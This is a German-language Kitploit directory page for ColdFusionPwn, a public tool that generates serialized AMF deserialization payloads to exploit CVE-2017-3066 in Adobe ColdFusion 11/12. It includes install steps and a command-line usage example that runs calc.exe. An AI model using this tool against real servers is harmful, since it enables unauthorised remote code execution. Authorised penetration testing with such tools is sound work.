Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ColdFusionPwn — Exploit-Tool für CVE-2017-3066, das Adobe Coldfusion 11/12 angreift | Kitploit
Tools/GitHubGitHub/codewhitesec/coldfusionpwn
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubcodewhitesec/coldfusionpwn

ColdFusionPwn

Exploit-Tool für CVE-2017-3066, das Adobe Coldfusion 11/12 angreift

Repository anzeigen
9529vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ColdFusionPwn

Exploitation-Tool für CVE-2017-3066, das Adobe Coldfusion 11/12 angreift.

Beschreibung

Das Tool ermöglicht es Ihnen, serialisierte AMF-Payloads zu generieren, um die fehlende Eingabevalidierung erlaubter Klassen auszunutzen. Details finden Sie in unserem Blogbeitrag.

Installation

Laden Sie die neueste Version von ysoserial herunter. Laden Sie ColdFusionPwn von den Veröffentlichungen herunter.

Verwendung

root@kitploit:~
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
root@kitploit:~
- [-s|-e]         Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type]  ysoserial gadget payload 
- [command]       command to be executed
- [outfile]       output file for the generated payload

Es ist erforderlich, dass ColdFusionPwn-0.0.1-SNAPSHOT-all.jar als erster Eintrag im Classpath steht, da die mit ysoserial gelieferte ApacheCommons BeanUtils-Bibliothek neuer ist (und eine andere serialversion uid hat).

Beispiele

root@kitploit:~
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf
Tool herunterladen